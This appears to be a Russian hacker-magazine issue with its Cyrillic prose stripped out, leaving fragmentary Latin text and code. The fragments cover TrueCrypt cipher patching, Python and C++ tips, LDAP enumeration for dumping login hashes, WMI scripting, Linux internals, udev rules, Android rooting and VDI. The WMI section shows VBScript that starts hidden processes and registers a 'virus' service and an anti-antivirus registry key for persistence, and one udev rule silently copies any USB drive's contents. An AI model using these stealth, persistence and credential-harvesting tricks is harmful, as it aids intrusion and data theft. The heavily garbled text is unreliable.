, MSVS 2010 TrueCrypt
Crypto,
, .
BelT. (, Mount)
Crypto.h :
enum {
NONE = 0,
AES,
...
};


.
BELT, #ifndef TC_WIN...,

TrueCrypt


. , key schedule ( ,
, ,
32 ):
#define BELT_KS 32

#ifdef TC_WINDOWS_BOOT_SINGLE_MODE.
key schedule ,
.
:
#elif defined(TC_WINDOWS_BOOT_BELT)
#define MAX_EXPANDED_KEY BELT_KS
#endif

include BelT (#include "Belt.h"). Crypto.h


.
Crypto.c, Ciphers[] Cipher.
#ifndef TC_WIN... :
{ BELT, "BelT ( 34.101.31)", 16, 32, BELT_KS },

34.101.31-2011
BelT,
34.101.31-2011, ,
. Belt
128 128, 192 256
.
28147-89

2^32, (
)
.
: , Belt
SP-.
,
:
2^32, XOR, .


,
. 128
32- , .
K , 56
. 256-
(k[1],..., k[8]) :
K[1]=k[1], ..., K[8]=k[8], K[9]=k[1], ..., K[56]=k[8]

.
1,
i. G 32-
H
.
.


True-

BelT

XTS

Cipher
, , , key schedule .
EncryptionAlgorithms[]
EncryptionAlgorithm. -
, TC_WINDOWS_BOOT,
.
( ):

34.101.31 (
),
XTS, CRC32 .
,
.

{{ BELT, 0 }, {XTS, 0, 0, 0}, 1}

(
),
XTS (
), ,
(
TrueCrypt).
.
CipherInit, ,
,
. key
schedule , ,
:
case BELT:
belt_init(key, ks);
break;

EncipherBlock
( ),
DecipherBlock ( ). , (
),
Belt.
, ,
, TrueCrypt,
bootloadera
BelT.
,
( ).
,
: ,


28147-89
TrueCrypt ,

XTS ,
128 , 64
. , ,
.
, 128 64-
, (
, ).
, ,
. ,
!

TrueCrypt
TrueCrypt, truecrypt,
truecrypt.org (
). ,
,
TrueCrypt PlainCrypt, http://localhost/.
, Win7/Vista x64
. ,
, .
, , Microsoft,
.

HAPPY END
, , . , ,
. z


(ivinside.blogspot.com)


,




,

.

,
, ,
None, .
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}

:
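def dictify(a, b):
    # More values than keys: nothing sensible to build,
    # return an empty dict
    if len(b) > len(a):
        return {}
    # Pair keys with values using
    # zip and dict
    dic = dict(zip(a, b))
    # Keys left without a value get None
    if len(b) < len(a):
        for i in xrange(len(b), len(a)):
            dic[a[i]] = None
    return dic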

, Python 2.2 dict,


for:
keys = ['a', 'b', 'c']
vals = [1, 2, 3]
dic = {}
for (k, v) in zip(keys, vals):
    dic[k] = v


map,
. None, zip,

None. :
def dictify(a, b):
    if len(b) > len(a):
        return {}
    dic = dict(map(None, a, b))
    return dic

>>> myappend(**a)

:
[1, 2, 3, 0]
[0]
[0, 0]

[1, 2, 3] .
, ,

a, 0.
,
myappend(), .
myappend(*a) :
AttributeError: 'int' object has no attribute 'append',
,
.
:
a = [[1, 2], 3]
myappend(*a)
# :
# myappend([1, 2], 3)

myappend(**a) , : TypeError: myappend() keywords must be strings.


, , -, , :
,
:
a = {'a':[1, 2], 'num':3}
myappend(**a)
# :
# myappend([1, 2], 3)

, .
>>> a = Keeper()
>>> b = Keeper()
>>> for i in Keeper.list_instances():
...     print i
<Keeper instance at 0x...

:
def myappend(a = [], num = 0):
    a.append(num)
    print a


:
>>> a = [1, 2, 3]
>>> myappend(a)
>>> myappend()
>>> myappend()
>>> a = {1:2, 3:4}
>>> myappend(*a)




Python. , ,

. :
def f(...):
    ...
f = staticmethod(f)

@staticmethod
def f(...):
    ...



staticmethod,
,
, . (
instances):
class Keeper:
    instances = []
    def __init__(self):
        self.instances.append(self)
    @staticmethod
    def list_instances():
        return Keeper.instances
a = Keeper()
b = Keeper()
for i in Keeper.list_instances():
    print i

__init__, , instances , list_instances ,


.
:
<__main__.Keeper instance at 0xb72aed4c>
<__main__.Keeper instance at 0xb72aee2c>

, ,
nmap. , tcp-
389, LDAP-. Anonymous
bind OK , , LDAP-,
DN .

,
login:hash,
. .
1. ldapminer. :
ldapminer -h <ip_> <>
-p [port]: 389
-B [bind]:
-w [password]:
-b [base search]: ,
-d [dump all]:

2. luma. ,
.
3. ldp. , Microsoft.
4. openldap.
LDAP-. ldapsearch. ,
.

?
389/tcp open ldap (Anonymous bind OK)

, Metasploit
LDAP-,
. z


1. ? ?
class A:
    def __init__(self, name):
        self.name = name
    def __del__(self):
        print self.name,
aa = [A(str(i)) for i in range(3)]
for a in aa:
    del a
print 'done'
# ...

2. , :
class Foo
{
public:
    Foo(int j) { i=new int[j]; }
    ~Foo() { delete i; }
private:
    int* i;
};
class Bar: Foo
{
public:
    Bar(int j) { i=new char[j]; }
    ~Bar() { delete i; }
private:
    char* i;
};
void main()
{
    Foo* f=new Foo(100);
    Foo* b=new Bar(200);
    *f=*b;
    delete f;
    delete b;
}

3. (, access- web-)
.
. ,
,
.
4. .
.


, ,
.
-
.
,
,

,
,
.

deeonis (deeonis@gmail.com)


, , .
,
-
.
:
.
, html- ,
.
,
. , ,
, , . ,
, ,
.
:
, ,
/, , .
, ,
.


:

class Parser
{
    // ..
public:
    void parsePage(string url)
    {
        while (url != "")
        {
            //
            getTopicText();
            //
            url = getNextUrl();
        }
    }
private:
    void getTopicText()
    {
        // ...
    }
    string getNextUrl()
    {
        // ...
    }
};

Parser,
parsePage(). .
parsePage() , .
,
getNextUrl() getTopicText(). ,
, , -,
( , - ),
-, .

, ,
,
. , , , .
, , ,
, ,
,
, .

class ParserSite2
{
    // ..
public:
    void parsePage(string url)
    {
        while (url != "")
        {
            //
            getDataOnPage();
            //
            url = getNextUrl();
        }
    }
private:
    void getDataOnPage()
    {
        // ...
    }
    string getNextUrl()
    {
        // ...
    }
};

, parsePage(),
. , , ,
, . :

class BaseParser
{
    // ..
public:
    virtual void parsePage(string url) = 0;
};
class ParserSite1: public BaseParser
{
public:
    void parsePage(string url)
    {
        while (url != "")
        {
            //
            getTopicText();
            //
            url = getNextUrl();
        }
    }
private:
    //
    void getTopicText()
    {
        // ..
    }
    string getNextUrl()
    {
        // ..
    }
};
class ParserSite2: public BaseParser
{
public:
    void parsePage(string url)
    {
        while (url != "")
        {
            //
            getTopicText();
            //
            url = getNextUrl();
        }
    }
private:
    void getTopicText()
    {
        // ..
    }
    string getNextUrl()
    {
        // ..
    }
};

Parser::getTopicText

parsePage ,
, .
, , ,
.
, ,
getNextUrl() ,
parsePage().

. , . .
parsePage()
ParserSite1 ParserSite2 BaseParser. ,
(
),
.
parsePage
, .



class BaseParser
{
    // ..
public:
    void parsePage(string url)
    {
        while (url != "")
        {
            //
            getTopicText();
            //
            url = getNextUrl();
        }
    }
protected:
    //
    virtual void getTopicText() = 0;
    virtual string getNextUrl() = 0;
};
class ParserSite1: public BaseParser
{
public:
    // parsePage,
    //
    // ,
    //
    //void parsePage(string url);
protected:
    //
    //
    void getTopicText()
    {
        // ..
    }
    string getNextUrl()
    {
        // ..
    }
};
class ParserSite2: public BaseParser
{
    // ParserSite1
};

, , , getNextUrl() getTopicText().
, ,
. ,

.
BaseParser.
,
. ? , , - , .
-
. BaseParser::parsePage().
-,
,
.

,
?
, , - ().
, ParserSite1
, ParserSite2 - . ,
. ,
- , ParserSite2 .
parsePage .

.
parsePage()
while. .

class BaseParser
{
    // ..
public:
    void parsePage(string url)
    {
        while (url != "")
        {
            //
            if (stopHook())
                break;
            // ...
        }
    }
protected:
    //
    virtual bool stopHook() {return false;};
    // ..
};

.
,
, (
).
False, .
BaseParser
.

class ParserSite1: public BaseParser
{
    // ..
protected:
    // ,
    //
    // bool stopHook();
};
class ParserSite2: public BaseParser
{
    // ..
private:
    int count;
protected:
    //
    bool stopHook()
    {
        if (count > 3)
            return true;
        else
            return false;
    }
    //
    void getTopicText()
    {
        // ...
        count++;
    }
};

, ParserSite1 , parsePage
. ParserSite2
,
, .
,
parsePage
, ,
.


. .
: ,
. , ,
. z

stopHook() ,



(stannic.man@gmail.com)

WMI:



,

.

,
Windows.

Windows Management Instrumentation (WMI),


. , ][

WMI (xakep.ru/magazine/xa/118/030/1.asp).
.


, WMI
. .
! .
, , WMI
. , , ,
WMI , .
.
?
Const SW_NORMAL = 1
Const SW_HIDE = 0
strComputer = "."
strCommand = "notepad.exe"
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" _
    & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = SW_NORMAL
Set objProcess = objWMIService.Get("Win32_Process")
intReturn = objProcess.Create _
    (strCommand, Null, objConfig, intProcessID)

Notepad

WMI:


WMIC /?. ,
.
, , WMIC. WMIC
WMI-.
, ,
. ,
,
process call create "calc.exe".
. , ?
100% , , :

ShowWindow:
, SW_HIDE = 0. ,
taskmanager ,
! !
-, vbs-, !
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objReg=GetObject( _
"winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\\CurrentControlSet\\Services\\MyService"
objReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strValueName = "Descrition"
strValue = "New Virus Service"
objReg.SetStringValue _
HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Windows, . , , , ,
. Windows XP, , Win7 HKEY_LOCAL_MACHINE .

HKEY_CURRENT_USER. ,
, . , ,
( , HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run),
vbs-. .

,
VB- Java. ,
WMI (WMI command-line).
wmic. WMI
,
VBS- JS-.
WMI WMI-, . ,
WMI, .
WMIC QFE
, .


wmic /NameSpace:\\root\default Class StdRegProv Call CreateKey hDefKey="&H80000002" sSubKeyName="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\fuck_avers"

, ,
,
,
. vb-
- ( ),
(
)
. -, .

, . ,
- , ,
Windows, .
, , , ,
. z

DYNAMICWRAPPERX

DynamicWrapperX (script-coding.com/dynwrapx.html).
WMI, ,
. ActiveX- (-),

VB- , dll-,
, Windows API.
, , CreateWindowEx vb
, . DynamicWrapperX

.
COM- :
"regsvr32.exe dynwrapx.dll", DynamicWrapperX

WinAPI- VB/Java-!
:
Set DX = CreateObject("DynamicWrapperX")
DX.Register "kernel32", "Beep", "i=uu"
DX.Beep 800, 1000
, ,
!


UNIXOID

Adept (adeptg@gmail.com)

OpenSource
.
-
: ,
,

,

.



.


Gimp 2.8


lsmod kmod

X: REVOLUTION
Wayland ( C,
10 000 , MIT),
X-! X :
,
.
Wayland (Wayland Compositor
Wayland Server) , X
, , X-,
. Wayland Compositor
Weston,

Wayland. Wayland Compiz Kwin.

Wayland Client ( ).

, X Server,
.

.
Wayland ,
Direct Rendering (DRI), KMS (Kernel Mode
Setting) GEM (Graphics Execution Manager),
Linux
Intel, Radeon Nouveau.

( , X11).
Wayland

,
.
(, ) Wayland :
Qt, GTK, EFL (Enlightenment Foundation Library),
Clutter, SDL. ,
(
),
X.Org- Wayland-


(
).
Wayland
( 2008 ),
, - . , 1.0
,
.

KMOD: EVOLUTION

RedHat
, ,

Linux ,
: goo.gl/RWgbf. ,
kmod.
module-init-tools (,
: lsmod,
modprobe, rmmod ), libkmod,

( LGPLv2 ).
udev.

modprobe ( ,
), libkmod


.

udev .
udev, kmod
systemd. Arch Linux, ,
kmod 4. Debian kmod 3.

SYSLOG: DESTRUCTION
Systemd (
SysVinit Upstart),
.
,

Journal, systemd
38. ,
syslog, .
syslog, , .
syslog
- :
, mysql
10000, .
, .

.
.
Syslog , Linux:
utmp/wtmp/btmp, lastlog, ,
.
,
.
-
,
(
).
syslog , : ,
.
,
.
:
, .
.
:

,
DoS-.

.
coredump.




.
Journal :
.
,
.
, .
,
.
,

, .

(, ).
git.
API syslog (
) .

.

.
, .

.
, utmp/wtmp,
.

SUID

, .
,
tail, less grep .

.

,

,
-
, .
/bin,/sbin,/lib(/lib64) /usr.
Fedora ( ,

RPM-).

.
,
read-only,
.
Solaris 11.

SUID/SGID- capabilities ,

. SUID-.
chroot, ,
libvirt-sandbox.
libvirt, ,
-,
read-only.
Fedora 17.
-, ,

Fedora :
.
Canonical
.
Ubuntu HUD (Head-Up Display): ,


UEFI (Unified Extensible Firmware Interface)
BIOS,
- , ,
, .
UEFI , ( )

GPT ( MBR).
UEFI . .
UEFI 35 ( ,
Linux 30 ),
2 200 .

.
UEFI,
2.3.1, secure boot. ,
: (,
SHA-256 ), (, ,
)
(RSA, 2048 ),
. ( )
.
, (,
MBR). ,
( )
,


.
( Gentoo), , ,
,
- UEFI. Red Hat, Canonical
Linux Foundation
, FSF
, secure boot
restricted boot ( ).
, ,
, Grub2
GPLv3, ,
.
Grub Legacy
GPLv2, GPLv3.
UEFI secure boot
,
. ,
Microsoft ,
/ Compatible with Windows 8,
Secure Boot.

. ARM
secure boot. :
( HP Dell) ,
secure boot.


,

. ,


.
. , , HUD
,
. , . ,
, HUD
Ubuntu 12.04.


,
,
,
.
.
IPv6. . , IPv4 World IPv6 Day, IPv6
.
IPv6 NAT. , , ,
, netfilter
.
FIOPS (Fair Input/Output Operations Per
Second) /, SSD.

CFQ ( ),
SSD, ,
,
,
.
CFQ
read/write .
, , ,
, Linux 3.5 .
ext4-snapshots
ext4 ( , btrfs).

LVM:

,

. , ,

ext3 (NEXT3)
.
Gimp 2.8, , -

.

OpenSource- id Tech 4, Doom 3.
Zenimax (
)
GPLv3 ( ).




,
.
.
Nftables iptables/netfilter. :
ABI, (iptables, arptables
ebtables ,
),
(-

). (
][ #127), , ,
, iptables. Fedora, ,

firewallD,
. Fedora
17 , ,
.

Linux
Linux Foundation.
: Maemo
Nokia (
Nokia 770, N800,

N810 N900 2005 ) Moblin


Intel ( 2007 ). 2010
Nokia Intel
Meego,

Maemo Moblin. ,

,
Linux Foundation.
N9 Nokia Meego, Windows Phone.
, Linux
Foundation LiMo
(Linux Mobile) Foundation
Tizen
HTML5. Meego, ,
Mer.
Tizen Samsung Bada.
, ,
,

.


. ,

. z
INFO

,

.

TiVo.

Wayland X Server

utmp/wtmp/
btmp
,

,
/

.

systemd
][ 148.

WWW

FAQ
wayland:
goo.gl/SNq3E.

X12: goo.gl/Mi23E.

Wayland. X.Org


UNIXOID

(zobnin@gmail.com)

KOBJECTS, SYSFS,
UDEV, UDISKS
UPOWER
Linux
2.6
sysfs,

.
sysfs

,

.
,
, .

, sysfs
, Linux .

, , udev
( /dev), udisks
( ) upower ( ,
ACPI
, sysfs).
.

KOBJECTS SYSFS
2.5,
2.6, , ,
. , KObject ,

, . ,
, SCSI-,
K-,
, - . , usb- usb-.
- (kset) , .


/sys/class/ .

/sys/device , ,
-, .
, /sys/devices . sysfs :
/sys/firmware/ firmware,
;
/sys/fs/ ,
FUSE ( ext4 );
/sys/kernel/
(, );
/sys/module/ , ,
( parameters,
);
/sys/power/ .

modules.alias


ddfs (Device
Drivers FileSystem),
- .
sysfs,
Linux. sysfs ?
sysfs
- , - ,
,
. , ,
, SATA-
, , ,
. ,
, ,
( ) .
. :
$ cat /sys/class/net/eth0/address

MAC- eth0.
/sys/class/net/eth0,
, ,
.
cat /sys/block/sda/size
sda, 512- .

sysfs .
,
, , .

UDEV
sysfs, , ,
? . Linux , , . -
procfs, ioctl-
, ( dmidecode). ,
, . sysfs
: ,

,
plug and play.
, sysfs
, udev, /dev
. Udev
netlink-, (
uevent) , USB- .
, ,
sysfs,
. , sysfs,
/dev,

# echo performance > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor

( , ) .
sysfs,
. ,
: class, block,
devices. , . ,
sysfs :
/sys/devices/ , ;
/sys/block/ ;
/sys/bus/ , ;


sysfs


udevadm monitor udev

minor/major-.
,
(, vendor , model
), sysfs modalias,
"pci:v000010ECd00008139sv00001734sd000010B8bc02sc00i00". , udev
.
,
. /lib/modules/_/modules.alias,
modprobe. udev
, modprobe
modalias .
:
# modprobe pci:v000010ECd...

udev,
devfs, ,
,
/dev,
,
sysfs.
, ,
/dev ,
. udev-.
/lib/udev/rules.d, /etc/udev/rules.d.

.
, udev
d-bus. ,
, PolicyKit,
. ,

udisks --show-info /dev/sda


. -
,
.

udev, ,
, udisks upower.

UDISKS UPOWER
udisks upower
.
DeviceKit, udev, . udev, sysfs d-bus ,

.
, sysfs,
, udev,
, -
. udisks upower
, , . Udisks, ,
(
udev) :

, , / ,
, . ,
root sysfs ,
d-bus,
PolicyKit . , udisks (,
- ), udev.
udisks ,
. , ,
:
$ udisks --dump




, UDEV
D-BUS

,
, SMART:
$ udisks --show-info /dev/sda

:
$ udisks --eject /dev/cdrom


udev

:
$ udisks --set-spindown /dev/sda --spindown-timeout

, , root. DE udisks
. , devmon. udisks devmon, ~/.xsession
( fluxbox ):

, . ,
,
,
.
,
,
udev, sysfs ACPI.
udisks, upower , , ,
.
upower --dump.

exec ck-launch-session bash -c "devmon & fluxbox"

.
upower -


sysfs udisks ,
. sysfs:

INFO

1. :


sysfs,

/sys/class,



.

$ grep -r . /sys/class/net/eth0/statistics

2. , ( - SSD
):
# echo 0 > /sys/block/sdb/queue/rotational


sysfs
uevent,


major/minor-.

udev

.

3. SCSI- ( ):
# echo "- - -" > /sys/class/scsi_host/host0/scan

4. USB-:
$ for i in `find /sys/devices/*/*/usb* \
-name level`; do echo -n "$i: "; cat $i; done

5. (,
):

upower --dump

/mnt.
.
2. :

# cat /sys/devices/virtual/dmi/id/*

6. :

ACTION=="add", KERNEL=="sd[a-z][0-9]", \
    ENV{ID_USB_DRIVER}=="usb-storage", \
    RUN+="/bin/cp -a /mnt/%k /backup/%k"

# cat /sys/class/hwmon/hwmon0/temp1_input

7. (
/sys/class/backlight/acpi_video0/max_brightness):


( /backup/_
) cp.
.

# echo 8 > /sys/class/backlight/acpi_video0/brightness

3. :
8. ( mem disk ):
# echo mem > /sys/power/state

, ,
sysfs. ,
.
udev. udev , ,
, . /lib/udev/rules.d () /etc/udev/rules.d.
,
.
/etc/udev/rules.d/99-custom.rules. ?
1. :
ACTION=="add", KERNEL=="sd[a-z][0-9]", \
    ENV{ID_USB_DRIVER}=="usb-storage", \
    RUN+="/bin/mkdir -p /mnt/%k"
ACTION=="add", KERNEL=="sd[a-z][0-9]", \
    ENV{ID_USB_DRIVER}=="usb-storage", \
    RUN+="/bin/mount -o rw,noexec,dmask=000,fmask=111,utf8 /dev/%k /mnt/%k"
ACTION=="remove", KERNEL=="sd[a-z][0-9]", \
    ENV{ID_USB_DRIVER}=="usb-storage", \
    RUN+="/bin/umount /mnt/%k"

, USB-. USB Mass Storage


SUBSYSTEM=="net", ATTR{address}=="aa:bb:cc:dd:ee:ff", NAME="lan0"
SUBSYSTEM=="net", ATTR{address}=="ff:ee:dd:cc:bb:aa", NAME="wlan0"

MAC- . ATTR{address} address sysfs.


4. :
ACTION=="add", SUBSYSTEM=="input", KERNEL=="mouse[1-9]", \
    ENV{DISPLAY}=":0.0", \
    ENV{XAUTHORITY}="/home/USERNAME/.Xauthority", \
    ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=1"
ACTION=="remove", SUBSYSTEM=="input", KERNEL=="mouse[1-9]", \
    ENV{DISPLAY}=":0.0", \
    ENV{XAUTHORITY}="/home/USERNAME/.Xauthority", \
    ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=0"

synclient ,
/dev/mouse0,
/dev/mouse1 .

sysfs Linux
,
,
. sysfs+udev+udisks.
,
. z


UNIXOID

(execbit.ru)



ANDROID-: CYANOGENMOD VS MIUI

Android
?
.


,


: CyanogenMod MIUI.
,

,
,

.


, CyanogenMod MIUI ,
Android.
, - Google
.
,


(, CyanogenMod
Geeksphone One, ,
).

, ,

.

CYANOGENMOD. ANDROID

OPEN SOURCE
, CyanogenMod (cyanogenmod.com). , Android
.


Android.
xda-developers,
Cyanogen ( ,
Samsung),
,
JesusFreke. CyanogenMod Android,
T-Mobile G1 (Android 1.5). ,
Cyanogen ,
,
,
, Google.
CyanogenMod
,
56 ,
Google Nexus S HTC Incredible, HTC Tattoo Huawei

(, ).
OpenVPN,
.
(,
tap-to-focus), .

.


CyanogenMod

CyanogenMod

U8220.
xda-developers.com.
7.1.0
Android 2.3.7.
, Android 4.0.3 (,
8.0 Android 3.0,
Google

). CyanogenMod
9,
.

- MIUI


CyanogenMod, ? .
-, CyanogenMod
,
, : , SSH-,
bash busybox.
-, CyanogenMod ,
,

. CyanogenMod
,

, ,
.
CyanogenMod
, .
,
CyanogenMod,
Android:
/etc/init.d. CyanogenMod,
Linux,
(,
samba ftpd) (
, ).

. CyanogenMod ,
ext2- .
bash, busybox


ssh,
SSH adb.
SSH- .


.
,
T-Mobile.
Android Market.

FLAC.
,
.
Wi-Fi, Bluetooth USB-
( CM
Android 2.2).
,
.

, Bionic.
,

, ?

. ? ,
:
root-,
(recovery),
Google- (, Gmail ).
root, boot-
NAND-,
(, ,
).
Android root
, -
(/bin/login) UID (/bin/su).
Android-.
:
Android zroot (goo.gl/mp6wg), Windows
Linux SuperOneClick (goo.gl/HIbN),
mono.
Android,
. ,
google.

recovery. SuperOneClick , Rom Manager,

SuperOneClick



(goo.gl/W8dJK). ,
Flash ClockworkMod Recovery. (
: cyanogenmod.com/devices)
Google (goo.gl/6OchT). Rom Manager
, Reboot into
Recovery. ( , ),
,
Wipe data/factory reset,
,
Yes. , Install zip from sdcard, ,
Yes. Google. Reboot system
now.


. ,
. .
.
, MIUI.
,
: Menu Settings CyanogenMod Settings
Interface Notification Power Widget
Widget Buttons.



.
: Menu Settings
Application Settings Development Stop
app via long-press.
CyanogenMod

.
: Menu Settings
CyanogenMod Settings Lockscreen
Lockscreen gestures.
LED-
: Menu Settings CyanogenMod
Settings Interface > LED notifications.
Android, CyanogenMod
, , .
,
,
: Menu Settings
CyanogenMod Settings Application Settings
Install location.
CyanogenMod . : Menu Settings
CyanogenMod Settings System Update
notifications.

: Menu Settings
CyanogenMod Settings Status bar tweaks
Battery Status Style Percentage.


, : Menu
Settings CyanogenMod Settings Input
Volume button music controls.
: Menu
Music Settings Enable gestures.

(, ),
(Menu Settings Applications
Manage Application),
Permissions ,
.

:
Menu Settings CyanogenMod settings
Lockscreen Unlock options Menu unlock.
,

, ,
: Menu
CyanogenMod settings Input Long press
home settings Number of recent apps.

: Menu CyanogenMod settings
Performance Disable boot animation.
Lock home in
memory,

.

MIUI


MIUI Samsung Galaxy S

Screenshot,
SD-, DCIM/
Screenshots.
CyanogenMod
DSPManager,
(, ).

MIUI. ANDROID -
MIUI ( Me
You I). CyanogenMod, ,
MIUI
Xiaomi Tech (xiaomi.com),
iOS
Android. 2010 ,

Android,
, , ,
. Xiaomi Tech

CyanogenMod
, , .

,
, CyanogenMod.


MIUI
. ,
,

. ,
,
,
,
,

. , , ,
,
.
, .
, -
MIUI, CyanogenMod, ,
, Android:
1. T9-.
,
Dialer One,
.
2.
, .
,
,
, .

3. . CyanogenMod, -

, MIUI
/. , , - ,
.
4. .


, 3G .

, .
5.
- . ,
,
,
.
6. (
).
7. OTA- .

.
8. . MIUI
, ,


INFO

Google,
Google
Nexus One, Google
Nexus S Samsung
Galaxy Nexus,

root-.
MIUI

: MI,
Mobile
Internet (,
,
Mission Impossible),
UI User Interface.



MIUI

,
.
9.
.
, Android.
10. .
,
.
MIUI
iOS,
iPhone, . MIUI iOS,
: , ,
,
. iOS:
,

,
, , .
, ,
,
( ,
- ).
MIUI .
, ssh
, , , ext2-. ,
, , ,

.


MIUI CyanogenMod,
,
Google, Gmail,
,
.

. ,
MIUI
, ,
.
, ,
miuiandroid.com (
ROMs).
miui.su,

.

. :
,
2.3.7,
- 2.1.20, ICS
(Android 4.0) 2.1.13. , .

.
3.
.
4.
.
5.
.
6. , .
7.
(SettingsSystem Battery
Notification Indicator Style Percentage).
8. , .
9.
,
.
10.

,
.

MIUI
. ,
,
.
, ,
. , MIUI.
1. .
2.

CyanogenMod
MIUI ,

.
,


.
,
, . z


SYN/ACK
SYN/ACK

(grinder@synack.ru), (j1m@synack.ru)

VDI WIN2K8R2
LINUX


, ,
, ,
,
.
,

,
, .
.

Hyper-V

VDI WIN2K8R2
Terminal Services Win2k8R2,
, Remote Desktop
Services (RDS). , VDI
(Virtual Desktop Infrastructure) Win2k8R2
DaaS (Desktop as a Service).
RD Virtualization Host Hyper-V
VM, RDS RDP.
(
) ,
.
, , ,
. .
TS/RDS VDI ,

,
.
, ,
, ,
. : , .
:
Personal Virtual Desktops ,
, ,
VD;
Virtual Machine Pool
VDI, , ,
,
.
VD .
, (,
, ), , ,
.
, VD,
,
. : -


AD

,
, .
, , AD ( Win2k8R2),

(Active Directory -> ), (Personal Virtual Desktop).
VDI RDS:
RD Web Access , ,
;
RD Gateway ,
;
RD Connection Broker VM, , ;
Remote Desktop Session Host (RDSH) , RemoteApp;
RD Virtualization Host (RDVH)
VDI, Hyper-V ( ,
);
RD Licensing RDS CALs, 120
.
VDI , VDI RD Web Access RDP ,
.
:
Hyper-V, RDP, -

VDI
,



. ,
Hyper-V RDS (Add RD Virtualization Host Server) (Configure Virtual Desktops Wizard),
Hyper-V, RD
Connection Broker RD Web Access.
. AD (Assign Personal Virtual Desktop). VD
RD Connection Broker Virtual
Machine Pool Creation Wizard,
RD Connection Broker.
(BPA).

- QVD Web Administration Tool

SPICE
UNIX
, , ,
. UNIX . X-,
,
. , 80-.
X- .
, ,
X- .
,
. , ,
.
, . Spice
. Spice ,
, ,
, USB- .
,
,
, , -, , (
, , ). Spice
-

,
, , ,
, - .
, Spice ,
.

. , Spice,
, Spice-, /,
Spice-
( ).
Red Hat, Spice 2009 ,
, . Spice
QEMU, libvirt virt-manager virsh. Spice,
, X-,
spicec, X
Window, Firefox, GTK Qt.
,
Spice- :

QVD


1. :
$ sudo apt-get install qemu-kvm


- Ulteo

$ qemu-kvm -spice port=1234,disable-ticketing \
    -hda ////

,
:

2. :

$ sudo /etc/init.d/libvirtd start

$ sudo apt-get install spice-client


$ spicec -h localhost -p 1234

, virt-manager libvirtd:

, - ,
,
virt-manager.
, virt-manager ,
libvirtd ssh. ,
qemu, libvirt libvirtd:

$ sudo apt-get install virt-manager


$ virt-manager -c qemu+ssh://root@server.com/system

$ sudo apt-get install bridge-utils dnsmasq \
    kvm qemu libvirt libvirt-bin

, , , .
UNIX, Spice- xorg-video-qxl,
.
, -> ,
, Graphics,
Spice server,

MED-V APP-V
,
WinXP Win7 Vista
. ,
.
. MEDV (Microsoft Enterprise Desktop Virtualization, clck.ru/WQqT)
VDI, .
XP Mode,
(WinXP/Vista) Virtual
PC. ,
,
.
App-V (Microsoft Application Virtualization)
,
.


(
), . , App-V
,
( MED-V),
.
, ,
.
Win7 Home/Starter
.
MED-V, MDOP (Desktop Optimization Pack, ).
, MED-V, ,
, MED-V 2.0 App-V
System Center Configuration Manager.


SPICE
,
, USB-,

. qxl,
qxl. , Spice.
,
Spice- . Linux , X-
.

:
spicec -f -h _ -p _ -w

~/.xsession ,
exec, ~/.config/autostart, .
Spice-

.
( , ), .
, Spice .
virt-manager .
(

-> Clone) . ,
, 10-15, ,
virt-manager (
).

QVD
QVD (Quality Virtual Desktop, theqvd.com)
, VDI
, GNU/Linux VM
.
VDI . VDI,
. VD (overlays),
( )
. .
Windows Linux,
Android.
QVD ,
(Return on Investment, ROI). , BBVA Bancomer.
QVD KVM (Kernel Virtual Machine),
NX,
. LDAP.
:
QVD-,
PostgreSQL. ,
. , QVD
35 000 -

[Figure: Spice architecture. QEMU VM guest (vdagent, qxl driver, standard guest drivers); virtual devices (vmc virtio-serial, QXL (cirrus), keyboard, mouse, tablet, AC97, ES1370, nic); spice server channels (main, display, cursor, inputs, record, playback, tunnel); spice client on the user's machine (printer)]



INFO

ULTEO OPEN VIRTUAL DESKTOP (OVD)


OVD (ulteo.com) ,
Mandrake/Mandriva Linux,
-

Linux Windows.
,
Java .
Amazon EC2. OVD
: ,
, .
.
LDAP/AD CAS.
RC8 3.0.

HTTPS/443,

RDP (TCP/3389).
,
.
, .
( )
Ubuntu 10.04 LTS, RHEL 5.5 ( CentOS Fedora), Novell SLES 11 SP1, Win2k3/2k8/R2 (
). DVD,
Ubuntu.
Ulteo
,
, ,
,
.

ORACLE VDI
, Oracle Virtualization
,
( Sun Ray)
(Sun Fire, Sun Storage). Oracle VDI
connection broker

RDP SGD (Oracle Secure Global Desktop).
(Virtualization Layer)
VirtualBox, VMware vSphere, Hyper-V, ,
RDP.
(Windows, Solaris,
Linux, *nix ). SGD
-,
(,
Java[RR1]),

WWW
(
cookie, , ).
, VDI
Java -. kiosk
mode
.
Array Resilience

.
, ,
,
32- .
AD/LDAP.
Solaris Oracle Enterprise
Linux ( RHEL).

9 000 ,
. ,
VM IP.
: L7R, HKD (House Keeping
Daemon), / VM , Node
L7R HKD. NAS/SAN .
- QVD Web Administration
Tool (WAT, Perl Catalyst) (qvd-admin).
QVD Community, Commercial Cloud ( QVD).
.
Ubuntu 10.04
LTS SLES, (
Ubuntu 10.10). , QVD
Linux. Ubuntu 10.04
LTS ,
:
$ sudo apt-add-repository \
'deb http://theqvd.com/debian lucid main'
$ sudo apt-get update




Win2k8 ][
09.08;
HyperV

, ][
02.09;
][ 11.10

VMware View 4.5;
Win2k8R2 RDS

/

IP-

,

IP;
TS/RDS
VDI
,

;

QVD

BBVA
Bancomer.


Microsoft
RDS
VDI: clck.ru/WddP;
QVD:
theqvd.com.

WARNING



HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer

AllowRemoteRPC 1.

qvd-*.
, :
$ sudo apt-get install \
qvd-demo-single-instance-nosupport qvd-admin

WAT, 3000 , .
, , ( , ).
/var/lib/qvd/storage (
NFS): homes (qcow2 /home), images (), overlays ( )
